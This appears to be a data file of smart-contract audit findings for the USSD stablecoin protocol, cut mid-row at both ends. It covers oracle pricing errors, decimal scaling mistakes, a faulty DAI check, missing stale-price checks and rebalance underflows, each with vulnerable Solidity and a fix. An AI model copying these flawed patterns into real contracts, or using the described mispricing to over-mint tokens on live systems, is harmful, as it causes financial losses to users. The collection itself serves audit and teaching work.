IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n" +`StableOracleDAI` calculates `getPriceUSD` with inverted base/rate tokens for Chainlink price,high,"`StableOracleDAI::getPriceUSD()` calculates the average price between the Uniswap pool price for a pair and the Chainlink feed as part of its result.\\nThe problem is that it uses `WETH/DAI` as the base/rate tokens for the pool, and `DAI/ETH` for the Chainlink feed, which is the opposite.\\nThis will incur in a huge price difference that will impact on the amount of USSD tokens being minted, while requesting the price from this oracle.\\nIn `StableOracleDAI::getPrice()` the `price` from the Chainlink feed `priceFeedDAIETH` returns the `price` as DAI/ETH.\\nThis can be checked on Etherscan and the Chainlink Feeds Page.\\nAlso note the comment on the code is misleading, as it is refering to another pair:\\nchainlink price data is 8 decimals for WETH/USD\\n```\\n/// constructor\\n priceFeedDAIETH = AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n\\nLink to code\\nOn the other hand, the price coming from the Uniswap pool `DAIWethPrice` returns the price as `WETH/DAI`.\\nNote that the relation WETH/DAI is given by the orders of the token addresses passed as arguments, being the first the base token, and the second the quote token.\\nAlso note that the variable name `DAIWethPrice` is misleading as well as the base/rate are the opposite (although this doesn't affect the code).\\n```\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token) // @audit\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token) // @audit\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n```\\n\\nLink to code\\nFinally, both values are used to calculate an average price of in `((DAIWethPrice + uint256(price) * 1e10) / 2)`.\\nBut as seen, one has price in `DAI/ETH` and the other one in `WETH/DAI`, which leads to an incorrect result.\\n```\\n return\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n\\nLink to code\\nThe average will be lower in this case, and the resulting price higher.\\nThis will be used by `USSD::mintForToken()` for calculating the amount of tokens to mint for the user, and thus giving them much more than they should.\\nAlso worth mentioning that `USSDRebalancer::rebalance()` also relies on the result of this price calculation and will make it perform trades with incorrect values.","Calculate the inverse of the `price` returned by the Chainlink feed so that it can be averaged with the pool `price`, making sure that both use the correct `WETH/DAI` and `ETH/DAI` base/rate tokens.","Users will receive far more USSD tokens than they should when they call `mintForToken()`, ruining the token value.\\nWhen performed the `USSDRebalancer::rebalance()`, all the calculations will be broken for the DAI oracle, leading to incorrect pool trades due to the error in `getPrice()`","```\\n/// constructor\\n priceFeedDAIETH = AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n" +`USSDRebalancer.sol#SellUSSDBuyCollateral` the check of whether collateral is DAI is wrong,high,"The `SellUSSDBuyCollateral` function use `||` instand of `&&` to check whether the collateral is DAI. It is wrong and may cause `SellUSSDBuyCollateral` function revert.\\n```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n\\nLine 199 should use `&&` instand of `||` to ensure that the token is not DAI. If the token is DAI, the `UniV3SwapInput` function will revert because that DAI's `pathbuy` is empty.","```\\n for (uint256 i = 0; i < collateral.length; i// Add the line below\\n// Add the line below\\n) {\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n// Remove the line below\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n// Add the line below\\n if (collateral[i].token != uniPool.token0() && collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n }\\n }\\n```\\n",The `SellUSSDBuyCollateral` will revert and USSD will become unstable.,"```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n" +The getOwnValuation() function contains errors in the price calculation,high,"The getOwnValuation() function in the provided code has incorrect price calculation logic when token0() or token1() is equal to USSD. The error leads to inaccurate price calculations.\\nThe `USSDRebalancer.getOwnValuation()` function calculates the price based on the sqrtPriceX96 value obtained from the uniPool.slot0() function. The calculation depends on whether token0() is equal to USSD or not. If token0() is equal to USSD, the price calculation is performed as follows:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n\\nHowever,there is an error in the price calculation logic. The calculation should be:\\n```\\nprice = uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 (96 * 2);\\n```\\n\\nIf token0() is not equal to USSD, the price calculation is slightly different:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e18 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n\\nThe calculation should be:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n","When token0() is USSD, the correct calculation should be uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 >> (96 * 2). When token1() is USSD, the correct calculation should be\\n```\\nprice = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n","The incorrect price calculation in the getOwnValuation() function can lead to significant impact on the valuation of assets in the UniSwap V3 pool. The inaccurate prices can result in incorrect asset valuations, which may affect trading decisions, liquidity provision, and overall financial calculations based on the UniSwap V3 pool.",```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n +The price from `StableOracleDAI` is returned with the incorrect number of decimals,high,"The price returned from the `getPriceUSD` function of the `StableOracleDAI` is scaled up by `1e10`, which results in 28 decimals instead of the intended 18.\\nIn `StableOracleDAI` the `getPriceUSD` function is defined as follows...\\n```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n\\nThe assumption is made that the `DAIWethPrice` is 8 decimals, and is therefore multiplied by `1e10` in the return statement to scale it up to 18 decimals.\\nThe other price feeds used in the protocol are indeed received with decimals, however, the Chainlink DAI/ETH price feed returns a value with 18 decimals as can be seen on their site.",Remove the `* 1e10` from the return statement.\\n```\\n// Remove the line below\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice // Add the line below\\n uint256(price) * 1e10) / 2);\\n// Add the line below\\n return (wethPriceUSD * 1e18) / (DAIWethPrice // Add the line below\\n uint256(price) / 2);\\n```\\n,"This means that the price returned from the `getPriceUSD` function is scaled up by `1e10`, which results in 28 decimals instead of the intended 18, drastically overvaluing the DAI/USD price.\\nThis will result in the USSD token price being a tiny fraction of what it is intended to be. Instead of being pegged to $1, it will be pegged to $0.0000000001, completely defeating the purpose of the protocol.\\nFor example, if a user calls `USSD.mintForToken`, supplying DAI, they'll be able to mint `1e10` times more USSD than intended.","```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n" +Wrong computation of the amountToSellUnit variable,high,The variable `amountToSellUnits` is computed wrongly in the code which will lead to an incorrect amount of collateral to be sold.\\nThe `BuyUSSDSellCollateral()` function is used to sell collateral during a peg-down recovery event. The computation of the amount to sell is computed using the following formula:\\n```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n\\nThe idea is to sell an amount which is equivalent (in USD) to the ratio of `amountToBuyLeftUSD / collateralval`. Flattening the equation it ends up as:\\n```\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD * 1e18) / (collateralval * 1e18 * 1e18);\\n\\n// Reducing the equation\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD) / (collateralval * 1e18);\\n```\\n\\n`amountToBuyLeftUSD` and `collateralval` already have 18 decimals so their decimals get cancelled together which will lead the last 1e18 factor as not necessary.,Issue Wrong computation of the amountToSellUnit variable\\nDelete the last 1e18 factor,The contract will sell an incorrect amount of collateral during a peg-down recovery event.,```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n +Calls to Oracles don't check for stale prices,medium,"Calls to Oracles don't check for stale prices.\\nNone of the oracle calls check for stale prices, for example StableOracleDAI.getPriceUSD():\\n```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n","Read the `updatedAt` parameter from the calls to `latestRoundData()` and verify that it isn't older than a set amount, eg:\\n```\\nif (updatedAt < block.timestamp - 60 * 60 /* 1 hour */) {\\n revert(""stale price feed"");\\n}\\n```\\n",Oracle price feeds can become stale due to a variety of reasons. Using a stale price will result in incorrect calculations in most of the key functionality of USSD & USSDRebalancer contracts.,"```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n" +"rebalance process incase of selling the collateral, could revert because of underflow calculation",medium,"rebalance process, will try to sell the collateral in case of peg-down. However, the process can revert because the calculation can underflow.\\nInside `rebalance()` call, if `BuyUSSDSellCollateral()` is triggered, it will try to sell the current collateral to `baseAsset`. The asset that will be sold (amountToSellUnits) first calculated. Then swap it to `baseAsset` via uniswap. However, when subtracting `amountToBuyLeftUSD`, it with result of `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`. There is no guarantee `amountToBuyLeftUSD` always bigger than `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`.\\nThis causing the call could revert in case `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`.\\nThere are two branch where `amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` is performed :\\nIncase `collateralval > amountToBuyLeftUSD`\\n`collateralval` is calculated using oracle price, thus the result of swap not guaranteed to reflect the proportion of `amountToBuyLefUSD` against `collateralval` ratio, and could result in returning `baseAsset` larger than expected. And potentially `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`\\n```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n\\nIncase `collateralval < amountToBuyLeftUSD`\\nThis also can't guarantee `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` < `amountToBuyLeftUSD`.\\n```\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n```\\n","Check if `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`, in that case, just set `amountToBuyLeftUSD` to 0.\\n```\\n // rest of code\\n uint baseAssetChange = IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n if (baseAssetChange > amountToBuyLeftUSD) {\\n amountToBuyLeftUSD = 0;\\n } else {\\n amountToBuyLeftUSD -= baseAssetChange;\\n }\\n DAItosell += baseAssetChange;\\n // rest of code\\n```\\n",Rebalance process can revert caused by underflow calculation.,"```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n" +StableOracleWBTC use BTC/USD chainlink oracle to price WBTC which is problematic if WBTC depegs,medium,"The StableOracleWBTC contract utilizes a BTC/USD Chainlink oracle to determine the price of WBTC. However, this approach can lead to potential issues if WBTC were to depeg from BTC. In such a scenario, WBTC would no longer maintain an equivalent value to BTC. This can result in significant problems, including borrowing against a devalued asset and the accumulation of bad debt. Given that the protocol continues to value WBTC based on BTC/USD, the issuance of bad loans would persist, exacerbating the overall level of bad debt.\\nImportant to note that this is like a 2 in 1 report as the same idea could work on the StableOracleWBGL contract too.\\nThe vulnerability lies in the reliance on a single BTC/USD Chainlink oracle to obtain the price of WBTC. If the bridge connecting WBTC to BTC becomes compromised and WBTC depegs, WBTC may depeg from BTC. Consequently, WBTC's value would no longer be equivalent to BTC, potentially rendering it worthless (hopefully this never happens). The use of the BTC/USD oracle to price WBTC poses risks to the protocol and its users.\\nThe following code snippet represents the relevant section of the StableOracleWBTC contract responsible for retrieving the price of WBTC using the BTC/USD Chainlink oracle:\\n```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n\\nNB: key to note that the above pricefeed is set to the wrong aggregator, the correct one is this: `0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599`","To mitigate the vulnerability mentioned above, it is strongly recommended to implement a double oracle setup for WBTC pricing. This setup would involve integrating both the BTC/USD Chainlink oracle and an additional on-chain liquidity-based oracle, such as UniV3 TWAP.\\nThe double oracle setup serves two primary purposes. Firstly, it reduces the risk of price manipulation by relying on the Chainlink oracle, which ensures accurate pricing for WBTC. Secondly, incorporating an on-chain liquidity-based oracle acts as a safeguard against WBTC depegging. By monitoring the price derived from the liquidity-based oracle and comparing it to the Chainlink oracle's price, borrowing activities can be halted if the threshold deviation (e.g., 2% lower) is breached.\\nAdopting a double oracle setup enhances the protocol's stability and minimizes the risks associated with WBTC depegging. It ensures accurate valuation, reduces the accumulation of bad debt, and safeguards the protocol and its users","Should the WBTC bridge become compromised or WBTC depeg from BTC, the protocol would face severe consequences. The protocol would be burdened with a substantial amount of bad debt stemming from outstanding loans secured by WBTC. Additionally, due to the protocol's reliance on the BTC/USD oracle, the issuance of loans against WBTC would persist even if its value has significantly deteriorated. This would lead to an escalation in bad debt, negatively impacting the protocol's financial stability and overall performance.","```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n" +Inaccurate collateral factor calculation due to missing collateral asset,medium,"The function `collateralFactor()` in the smart contract calculates the collateral factor for the protocol but fails to account for the removal of certain collateral assets. As a result, the total value of the removed collateral assets is not included in the calculation, leading to an inaccurate collateral factor.\\nThe `collateralFactor()` function calculates the current collateral factor for the protocol. It iterates through each collateral asset in the system and calculates the total value of all collateral assets in USD.\\nFor each collateral asset, the function retrieves its balance and converts it to a USD value by multiplying it with the asset's price in USD obtained from the corresponding oracle. The balance is adjusted for the decimal precision of the asset. These USD values are accumulated to calculate the totalAssetsUSD.\\n```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n\\nHowever, when a collateral asset is removed from the collateral list, the `collateralFactor` function fails to account for its absence. This results in an inaccurate calculation of the collateral factor. Specifically, the totalAssetsUSD variable does not include the value of the removed collateral asset, leading to an underestimation of the total collateral value. The function `SellUSSDBuyCollateral()` in the smart contract is used for rebalancing. However, it relies on the `collateralFactor` calculation, which has been found to be inaccurate. The `collateralFactor` calculation does not accurately assess the portions of collateral assets to be bought or sold during rebalancing. This discrepancy can lead to incorrect rebalancing decisions and potentially impact the stability and performance of the protocol.\\n```\\n function removeCollateral(uint256 _index) public onlyControl {\\n collateral[_index] = collateral[collateral.length - 1];\\n collateral.pop();\\n }\\n```\\n",Ensure accurate calculations and maintain the integrity of the collateral factor metric in the protocol's risk management system.,"As a consequence, the reported collateral factor may be lower than it should be, potentially affecting the risk assessment and stability of the protocol.",```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n +Inconsistency handling of DAI as collateral in the BuyUSSDSellCollateral function,medium,"DAI is the base asset of the `USSD.sol` contract, when a rebalacing needs to occur during a peg-down recovery, collateral is sold for DAI, which then is used to buy USSD in the DAI / USSD uniswap pool. Hence, when DAI is the collateral, this is not sold because there no existe a path to sell DAI for DAI.\\nThe above behavior is handled when collateral is about to be sold for DAI, see the comment `no need to swap DAI` (link to the code):\\n```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n\\nThe problem is in the `else branch` of the first if statement `collateralval > amountToBuyLeftUSD`, which lacks the check `if (collateral[i].pathsell.length > 0)`",Handle the case as is the done on the if branch of collateralval > amountToBuyLeftUSD:\\n```\\nif (collateral[i].pathsell.length > 0) {\\n // Sell collateral for DAI\\n}\\nelse {\\n // No need to swap DAI\\n}\\n```\\n,A re-balancing on a peg-down recovery will fail if the `collateralval` of DAI is less than `amountToBuyLeftUSD` but greater than `amountToBuyLeftUSD / 20` since the DAI collateral does not have a sell path.,"```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n" +Risk of Incorrect Asset Pricing by StableOracle in Case of Underlying Aggregator Reaching minAnswer,medium,"Chainlink aggregators have a built-in circuit breaker to prevent the price of an asset from deviating outside a predefined price range. This circuit breaker may cause the oracle to persistently return the minPrice instead of the actual asset price in the event of a significant price drop, as witnessed during the LUNA crash.\\nStableOracleDAI.sol, StableOracleWBTC.sol, and StableOracleWETH.sol utilize the ChainlinkFeedRegistry to fetch the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData extracts the linked aggregator and requests round data from it. If an asset's price falls below the minPrice, the protocol continues to value the token at the minPrice rather than its real value. This discrepancy could have the protocol end up minting drastically larger amount of stableCoinAmount as well as returning a much bigger collateral factor.\\nFor instance, if TokenA's minPrice is $1 and its price falls to $0.10, the aggregator continues to report $1, rendering the related function calls to entail a value that is ten times the actual value.\\nIt's important to note that while Chainlink oracles form part of the OracleAggregator system and the use of a combination of oracles could potentially prevent such a situation, there's still a risk. Secondary oracles, such as Band, could potentially be exploited by a malicious user who can DDOS relayers to prevent price updates. Once the price becomes stale, the Chainlink oracle's price would be the sole reference, posing a significant risk.","StableOracle should cross-check the returned answer against the minPrice/maxPrice and revert if the answer is outside of these bounds:\\n```\\n (, int256 price, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n if (price >= maxPrice or price <= minPrice) revert();\\n```\\n\\nThis ensures that a false price will not be returned if the underlying asset's value hits the minPrice.","In the event of an asset crash (like LUNA), the protocol can be manipulated to handle calls at an inflated price.","```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n" +`BuyUSSDSellCollateral()` always sells 0 amount if need to sell part of collateral,medium,"Due to rounding error there is misbehaviour in `BuyUSSDSellCollateral()` 